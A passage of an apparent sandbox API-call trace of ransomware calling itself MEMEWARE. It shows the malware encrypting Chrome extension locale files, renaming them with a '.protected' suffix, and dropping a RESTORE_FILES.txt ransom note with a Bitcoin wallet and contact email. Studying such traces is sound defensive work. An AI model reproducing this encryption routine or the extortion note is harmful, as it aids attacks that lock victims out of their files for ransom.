HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json") returned 162 [0080.998] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.998] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json") returned 162 [0080.998] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.998] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x269, lpOverlapped=0x0) returned 1 [0080.999] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd97, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.999] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x269, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x269, lpOverlapped=0x0) returned 1 [0080.999] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.000] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.000] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.000] CloseHandle (hObject=0x168) returned 1 [0081.000] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json.protected") returned 172 [0081.000] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\messages.json.protected")) returned 1 [0081.001] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.001] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.001] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\RESTORE_FILES.txt") returned 166 [0081.001] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.001] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.001] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.002] lstrlenA (lpString="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") returned 684 [0081.002] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.002] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.002] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.002] CloseHandle (hObject=0x164) returned 1 [0081.002] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.002] lstrcmpiW (lpString1="es", lpString2="Windows") returned -1 [0081.002] lstrcmpiW (lpString1="es", lpString2="Program Files") returned -1 [0081.002] lstrcmpiW (lpString1="es", lpString2="Program Files (x86)") returned -1 [0081.002] lstrcmpiW (lpString1="es", lpString2="$Recycle.bin") returned 1 [0081.002] lstrcmpiW (lpString1="es", lpString2="System Volume Information") returned -1 [0081.002] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es") returned 145 [0081.002] lstrcmpW (lpString1="es", lpString2=".") returned 1 [0081.003] lstrcmpW (lpString1="es", lpString2="..") returned 1 [0081.003] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\*") returned 147 [0081.003] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.003] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.003] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.003] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.003] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.003] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.003] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\.") returned 147 [0081.003] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.003] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.003] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.003] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.003] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.003] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.003] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.003] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\..") returned 148 [0081.003] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.003] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.003] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.003] lstrcmpiW (lpString1="messages.json", lpString2="Windows") 
returned -1 [0081.003] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.003] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.003] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.003] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.003] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json") returned 159 [0081.003] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.004] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.004] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.004] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.004] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.005] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json") returned 159 [0081.005] StrStrW (lpFirst="messages.json", lpSrch=".txt") 
returned 0x0 [0081.005] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json") returned 159 [0081.005] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.005] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json") returned 159 [0081.005] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.005] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2b8, lpOverlapped=0x0) returned 1 [0081.006] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd48, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.006] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2b8, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2b8, lpOverlapped=0x0) returned 1 [0081.007] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.007] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.007] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.007] CloseHandle (hObject=0x168) returned 1 [0081.007] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json.protected") returned 169 [0081.007] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json.protected")) returned 1 [0081.008] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.008] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.008] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\RESTORE_FILES.txt") returned 163 [0081.008] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.008] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.008] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.009] lstrlenA (lpString="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") returned 684 [0081.009] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.009] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.009] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.009] CloseHandle (hObject=0x164) returned 1 [0081.010] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.010] lstrcmpiW (lpString1="es_419", lpString2="Windows") returned -1 [0081.010] lstrcmpiW (lpString1="es_419", lpString2="Program Files") returned -1 [0081.010] lstrcmpiW (lpString1="es_419", lpString2="Program Files (x86)") returned -1 [0081.010] lstrcmpiW (lpString1="es_419", lpString2="$Recycle.bin") returned 1 [0081.010] lstrcmpiW (lpString1="es_419", lpString2="System Volume Information") returned -1 [0081.010] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419") returned 149 [0081.010] lstrcmpW (lpString1="es_419", lpString2=".") returned 1 [0081.010] lstrcmpW (lpString1="es_419", lpString2="..") returned 1 [0081.010] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\*") returned 151 [0081.010] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.010] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.010] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.010] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.010] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.010] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.010] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\.") returned 151 [0081.010] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.010] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.010] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.010] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.010] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.010] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.010] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.010] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\..") returned 152 [0081.010] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.011] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.011] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.011] lstrcmpiW (lpString1="messages.json", 
lpString2="Windows") returned -1 [0081.011] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.011] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.011] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.011] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.011] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json") returned 163 [0081.011] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.011] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.011] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.011] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.011] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.011] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json") returned 163 [0081.011] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.011] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json") returned 163 [0081.011] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.011] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json") returned 163 [0081.011] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.011] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x29b, lpOverlapped=0x0) returned 1 [0081.013] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd65, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.013] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x29b, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x29b, lpOverlapped=0x0) returned 1 [0081.013] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.013] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.013] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.013] CloseHandle (hObject=0x168) returned 1 [0081.013] wnsprintfW (in: pszDest=0xd11128, 
